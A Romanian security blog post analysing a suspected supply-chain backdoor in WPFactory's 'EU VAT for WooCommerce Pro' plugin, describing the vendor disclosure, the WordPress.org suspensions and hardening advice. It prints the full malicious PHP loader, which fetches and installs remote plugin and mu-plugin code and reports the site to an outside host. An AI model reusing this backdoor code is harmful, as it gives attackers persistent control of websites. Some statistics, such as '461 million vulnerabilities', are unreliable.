Breșă de securitate la WPFactory: 170.000 de site-uri WordPress au fost compromise

| Noutăți |

WordPress rămâne cel mai utilizat sistem de management al conținutului din lume, alimentând peste 40% din toate site-urile web de pe internet. De la site-uri web pentru afaceri mici și bloguri personale, la platforme mari pentru întreprinderi și infrastructuri de e-commerce, CMS-ul a devenit coloana vertebrală a web-ului modern. Popularitatea sa provine din flexibilitatea sa, ecosistemul deschis și numărul vast de plugin-uri disponibile pentru extinderea funcționalității sale.

Cu toate acestea, același ecosistem a devenit și una dintre cele mai mari provocări de securitate ale WordPress.

La Ferber Enterprises, echipa noastră de securitate cibernetică monitorizează în permanență amenințările care afectează ecosistemul WordPress, deoarece vulnerabilitățile din pluginuri, teme sau lanțurile de aprovizionare se pot transforma rapid în atacuri la scară largă, care afectează mii de site-uri web la nivel global. În ultimii ani, atacatorii au vizat din ce în ce mai mult dezvoltatorii de pluginuri și infrastructurile de distribuție, mai degrabă decât site-urile web individuale, permițând răspândirea codului rău intenționat prin actualizări de software de încredere și canale oficiale de descărcare.

În această săptămână a izbucnit o controversă majoră în care este implicată WPFactory, un cunoscut dezvoltator de pluginuri WordPress ale cărui produse sunt instalate pe peste 170.000 de site-uri web din întreaga lume. Peste 80 de pluginuri asociate companiei au fost suspendate temporar pe WordPress.org după ce echipa noastră de securitate cibernetică de la WPFactory a descoperit o posibilă ușă ascunsă în versiunea premium a unuia dintre pluginurile sale.

Incidentul a stârnit îngrijorări serioase în întreaga comunitate WordPress cu privire la securitatea lanțului de aprovizionare software, procesele de revizuire a plugin-urilor și sofisticarea în creștere a atacurilor care vizează ecosistemul open-source.

Descoperirea Comportamentului Suspect al Plugin-ului

Problema a ieșit la ținut de prima dată după ce echipa noastră de securitate cibernetică de la Ferber Enterprises a observat un comportament anormal în timpul testării versiunii premium a pluginului „EU VAT for WooCommerce Pro”, distribuit direct de pe site-ul oficial al acestuia.

Inițial, investigația a început după ce plugin-ul a generat o eroare fatală în timpul instalării. În timp ce depanau problema, analiștii noștri au identificat un fișier PHP suspect numit class-alg-wc-eu-vat-customer.php. Fișierul părea să execute un comportament complet inconsistent cu funcționalitatea așteptată a unui plugin WooCommerce VAT.

class-alg-wc-eu-vat-customer.php 
<?php
require_once dirname(__FILE__, 5) . '/wp-load.php';
$h = strtolower(preg_replace('/:\d+$/', '', $_SERVER['HTTP_HOST'] ?? ''));
$s = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
$ch = curl_init("$s://$h/wp-content/plugins/eu-vat-for-woocommerce-pro/eu-vat-for-woocommerce-pro.php");
curl_setopt_array($ch, [
    CURLOPT_NOBODY => 1,
    CURLOPT_RETURNTRANSFER => 1,
    CURLOPT_TIMEOUT => 10,
    CURLOPT_SSL_VERIFYPEER => 0
]);
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code !== 403 || ($_GET['scaramooch'] ?? '') === 'refresh') {
    $url = 'https://foodylicious.co.uk/change/akismet-pro.zip';
    $zipPath = sys_get_temp_dir() . '/plugin.zip';
    $zipData = file_get_contents($url);
    if ($zipData === false) {
        exit('Download failed');
    }
    file_put_contents($zipPath, $zipData);
    $zip = new ZipArchive;
    if ($zip->open($zipPath) === TRUE) {
        $zip->extractTo(dirname(__FILE__, 5) . '/wp-content/plugins/');
        $zip->close();
    } else {
        exit('ZIP open failed');
    }
    unlink($zipPath);
} else {
    $url = "https://foodylicious.co.uk/change/scara.php";
    $code = file_get_contents($url);
    if ($code !== false) {

        $baseDir = dirname(__FILE__, 4);

        $folderName = 'mu-plugins';

        $dir = $baseDir . '/' . $folderName;

        if (!is_dir($dir)) {
            mkdir($dir, 0755, true);
        }

        file_put_contents($dir . '/wp-redis.php', $code);
    }
}
$data = [
    'site_url' => get_site_url() . '/wp-content/plugins/eu-vat-for-woocommerce-pro/',
];
wp_remote_post('https://foodylicious.co.uk/change/tracks.php', [
    'body' => $data,
    'timeout' => 10,
]);

Conform analizei noastre, codul a încercat să:

  • Descarcă o arhivă ZIP externă de pe un server de la distanță
  • Modifică directoarele de bază WordPress
  • Comunicați cu infrastructura externă
  • Potențial, executați sarcini utile de la distanță pe site-urile web afectate

Acești indicatori au sugerat imediat prezența posibilă a unei uși din spate ascunse sau a unei compromiteri malițioase a lanțului de aprovizionare.

Ceea ce a făcut situația deosebit de îngrijorătoare a fost faptul că pluginul nu fusese descărcat de pe un server oglindă neoficial sau dintr-un depozit piratat. Pachetul a fost descărcat direct de pe portalul oficial pentru clienți al WPFactory, ceea ce a alimentat îngrijorările că însăși canalul de distribuție ar fi putut fi compromis.

La Ferber Enterprises, am documentat imediat incidentul și am demarat un proces de raportare responsabilă, contactând direct WPFactory prin GitHub.

Răspunsul inițial din partea WPFactory

WPFactory a răspuns inițial afirmând că fișierul și comportamentul suspect descrise în raport nu făceau parte din codul lor oficial.

Un reprezentant al companiei a sugerat mai multe explicații alternative, inclusiv:

  • O instalare locală modificată
  • Un mediu de site web compromis
  • O versiune de plugin depășită
  • O sursă de descărcare potențial compromisă

Compania a mai afirmat că nu a putut inspecta în siguranță fișierul ZIP furnizat, deoarece browserul lor a marcat arhiva ca fiind potențial nesigură.

Echipa noastră de securitate cibernetică a precizat ulterior că pluginul fusese descărcat direct de pe site-ul oficial al WPFactory și că fișierul suspect a rămas prezent chiar și după descărcarea unei copii noi a versiunii 4.6.1 de la aceeași sursă.

Acest detaliu a devenit un element central al anchetei. Dacă mai multe descărcări independente de pe canalul oficial de distribuție conțineau în mod constant același cod suspect, posibilitatea ca un site web local să fi fost compromis devenea din ce în ce mai puțin probabilă. În ciuda acestor constatări, WPFactory a declarat inițial că nu a reușit să reproducă problema la nivelul său și a susținut că fișierul suspect nu exista în pachetul oficial al pluginului.

Compania a solicitat apoi acces de administrator și FTP la mediul afectat pentru a continua investigația. La Ferber Enterprises, am respins această solicitare din motive de securitate cibernetică. Acordarea accesului privilegiat la server unui furnizor a cărui infrastructură ar fi putut fi ea însăși compromisă ar fi reprezentat un risc de securitate inacceptabil. În schimb, echipa noastră a continuat să furnizeze dovezi tehnice, inclusiv o demonstrație video care arăta comportamentul suspect al pluginului imediat după instalare.

Escaladare către WordPress.org

Pe măsură ce ancheta a avansat, au crescut îngrijorările cu privire la amploarea potențială a problemei. WPFactory deține un portofoliu extins de pluginuri, cuprinzând peste 65 de pluginuri, cu un total de peste 170.000 de instalări active. Prin urmare, orice breșă de securitate care ar afecta infrastructura de distribuție a companiei ar putea avea consecințe pe scară largă în întregul ecosistem WordPress.

Echipa noastră a semnalat problema direct către WordPress.org, în încercarea de a împiedica alți utilizatori să instaleze pachete potențial compromise pe durata desfășurării anchetei. Ulterior, WordPress.org a luat măsura excepțională de a retrage temporar peste 80 de pluginuri WPFactory din depozitul oficial.

Această măsură a atras imediat atenția întregii comunități de securitate WordPress, deoarece închiderea în masă a pluginurilor la o asemenea scară este relativ rară și indică, de obicei, probleme grave nerezolvate. În urma escaladării situației, WPFactory a recunoscut ulterior că problema părea reală și și-a cerut scuze pentru că nu a reacționat mai rapid la raportul inițial. Reprezentanții companiei au declarat că investighează activ problema și lucrează la găsirea unei soluții. O ipoteză ridicată intern de WPFactory sugerează că un pachet de pluginuri învechit sau stocat în cache ar fi putut fi distribuit involuntar prin infrastructura lor.

Cu toate acestea, echipa noastră de securitate cibernetică nu a fost de acord cu această evaluare. Comportamentul observat a indicat puternic o problemă de securitate mai profundă, care ar putea implica conducte de compilare, sisteme de distribuție compromise sau injectare neautorizată de cod în arhivele de plugin-uri descărcabile.

De ce contează acest incident

Controversa WPFactory scoate în evidență o amenințare tot mai mare la adresa securității cibernetice, cunoscută sub numele de „atac asupra lanțului de aprovizionare cu software”. În mod tradițional, atacatorii se concentrau pe compromiterea directă a site-urilor web individuale prin atacuri de tip „brute-force” sau prin vulnerabilități ale plugin-urilor. În prezent, actorii rău intenționați vizează din ce în ce mai mult chiar furnizorii de software, deoarece compromiterea unui furnizor de încredere permite răspândirea codului rău intenționat către mii de site-uri web simultan.

Această strategie a fost deja observată în mai multe incidente cibernetice de mare profil care au afectat ecosisteme globale de software în ultimul deceniu. În special în ecosistemul WordPress, dezvoltatorii de pluginuri reprezintă ținte atractive, deoarece pluginurile sunt în mod inerent de încredere pentru administratori și operează adesea cu permisiuni ridicate.

Dacă un cod rău intenționat este introdus într-un pachet de plugin distribuit printr-un canal oficial, site-urile web afectate pot instala ele însele, fără să-și dea seama, programe malware. În cazul pluginului suspect WPFactory, consecințele potențiale sunt grave.

Pe baza analizei noastre, comportamentul identificat ar putea teoretic permite atacatorilor să:

  • Implementează malware suplimentar
  • Injectați spam SEO
  • Creează backdoors persistente
  • Exfiltrarea datelor sensibile
  • Modifică instalațiile WordPress la distanță
  • Menține acces neautorizat pe perioade extinse

Pericolul unor astfel de atacuri constă în natura lor ascunsă. Ușile din spate moderne sunt adesea concepute pentru a rămâne în stare latentă timp de luni de zile înainte de a se activa, făcând detectarea semnificativ mai dificilă. La începutul acestei luni, echipa WordPress Plugins a închis peste 30 de pluginuri, după ce un cod malițios ascuns, încorporat într-un alt portofoliu de pluginuri, a rămas inactiv timp de aproximativ opt luni înainte de a se activa în cele din urmă și de a injecta spam SEO pe site-uri web.

Această tendință demonstrează cum atacatorii prioritizează tot mai mult persistența și activarea întârziată pentru a eluda mecanismele de detecție.

O criză de securitate mai amplă în ecosistemul WordPress

Incidentul WPFactory scoate la iveală și provocări sistemice mai ample în materie de securitate, care afectează WordPress în ansamblu. Ecosistemul de pluginuri s-a extins dramatic în ultimul deceniu, zeci de mii de pluginuri fiind disponibile atât pe piețele oficiale, cât și pe cele comerciale. Deși acest ecosistem stimulează inovarea și flexibilitatea, el generează totodată o complexitate enormă în ceea ce privește supravegherea securității.

Conform raportului “Starea securității WordPress în 2026” realizat de Patchstack, aproape 461 de milioane de vulnerabilități cunoscute nu au fost remediate înainte de a fi făcute publice. Această statistică reflectă presiunea tot mai mare la care sunt supuși atât dezvoltatorii de pluginuri, cât și cercetătorii în domeniul securității și administratorii de depozite.

În același timp, se pare că coada oficială de revizuire a pluginurilor WordPress depășește acum 4.000 de pluginuri care așteaptă să fie revizuite. Astfel de cifre ilustrează provocarea imensă de a menține asigurarea calității și auditul de securitate la scară largă.

Mulți dezvoltatori de pluginuri sunt echipe mici, cu resurse limitate în materie de securitate. Alții gestionează zeci de pluginuri simultan, punând în aplicare strategii agresive de creștere comercială care implică achiziții și extinderea portofoliului. Chiar și WPFactory s-a extins recent prin achiziții, printre care achiziția Extend-WP și a celor 19 pluginuri ale sale în 2025, urmată de achiziția WBW și a mai multor pluginuri suplimentare în aceeași an.

Expansiunea rapidă a portofoliului poate crea complexitate operațională care complică auditarea codului, managementul infrastructurii și verificarea integrității lansărilor. Atacatorii sunt conștienți de aceste realități. Din ce în ce mai mult, ei se concentrează pe exploatarea practicilor slabe de securitate operațională din cadrul furnizorilor de software, în loc să vizeze direct utilizatorii finali.

Importanța crescândă a securității lanțului de aprovizionare

Incidente precum acestea întăresc nevoia urgentă de practici mai robuste de securitate a lanțului de aprovizionare în întregul ecosistem WordPress.

La Ferber Enterprises, echipa noastră de securitate cibernetică recomandă cu tărie dezvoltatorilor de pluginuri să adopte câteva măsuri esențiale de protecție, printre care:

  • Semnarea pachetelor criptografice
  • Securizarea fluxurilor de lucru CI/CD
  • Autentificare multi-factor obligatorie
  • Segmentarea infrastructurii
  • Monitorizare continuă a integrității
  • Audituri de cod independente
  • Sisteme de build reproductibile

Administratorii de website ar trebui, de asemenea, să-și consolideze propria postură de securitate. Chiar și pluginurile descărcate din surse oficiale sau de încredere nu ar trebui considerate inerent sigure.

Organizațiile care gestionează infrastructuri critice WordPress ar trebui să ia în considerare:

  • Menținerea mediilor de staging
  • Monitorizarea traficului de ieșire
  • Scanarea pluginurilor înainte de implementare
  • Limitarea utilizării plugin-urilor
  • Aplicarea controalelor de acces cu cel mai mic privilegiu
  • Implementarea monitorizării integrității fișierelor
  • Utilizarea firewall-urilor gestionate pentru aplicații web (WAF)

În mediile de întreprindere, validarea lanțului de aprovizionare devine la fel de importantă ca managementul tradițional al vulnerabilităților. Presupunerea că canalele oficiale de software sunt întotdeauna sigure nu mai este realistă în peisajul amenințărilor de astăzi.

Reacții ale comunității și investigație în curs

Controversa s-a răspândit rapid în comunitatea WordPress, după ce dezvoltatorii, cercetătorii în securitate și furnizorii de infrastructură au început să discute public problema.

Mai multe personalități cunoscute din cadrul ecosistemului au contribuit la sensibilizarea publicului cu privire la această situație, printre care și dezvoltatori care au publicat liste cu pluginurile închise temporar și au încurajat administratorii să-și verifice mediile.

Între timp, echipa noastră de la Ferber Enterprises continuă să analizeze mostrele de pluginuri suspecte și să monitorizeze apariția unor indicatori suplimentari de compromitere care ar putea afecta site-urile WordPress la nivel global.

La momentul publicării, WPFactory a confirmat existența problemei și a declarat că lucrează activ la rezolvarea acesteia.

Cu toate acestea, multe întrebări rămân fără răspuns:

  • A fost compromisă infrastructura oficială de distribuție?
  • Cât timp au fost pachetele malițioase distribuite potențial?
  • Au fost afectate pluginuri suplimentare?
  • Conturile clienților sau sistemele de descărcare au fost compromise?
  • Au obținut atacatorii acces persistent la infrastructura internă?
  • Ar putea exista încă sarcini utile latente suplimentare?

Până când aceste întrebări vor fi complet rezolvate, prudența rămâne esențială.

Viitorul securității WordPress

Incidentul WPFactory ar putea deveni, în cele din urmă, un alt exemplu reprezentativ pentru provocările în materie de securitate cibernetică cu care se confruntă ecosistemul web open-source.

WordPress operează o porțiune enormă a economiei globale de internet. Orice compromitere la scară largă care afectează dezvoltatorii de plugin-uri poate, prin urmare, avea consecințe care se extind mult dincolo de site-urile individuale.

Pe măsură ce atacatorii continuă să-și perfecționeze metodele de compromitere a lanțului de aprovizionare și tehnicile de persistență ascunsă, securitatea plugin-urilor nu mai poate fi considerată o preocupare secundară. La Ferber Enterprises, considerăm că acest eveniment reprezintă un memento esențial al faptului că securitatea cibernetică nu se referă doar la protejarea site-urilor web în sine, ci și la securizarea fiecărui nivel al lanțului de distribuție a software-ului.

Încrederea în ecosistemele deschise depinde de transparență, răspuns rapid la incidente și practici solide de securitate operațională. Ecosistemul WordPress se află acum într-un moment important.

Modul în care dezvoltatorii, administratorii de repository, furnizorii de hosting și echipele de securitate răspund la incidente de acest gen va contribui la determinarea capacității WordPress de a continua să mențină încrederea milioanelor de afaceri și organizații care se bazează pe el zilnic.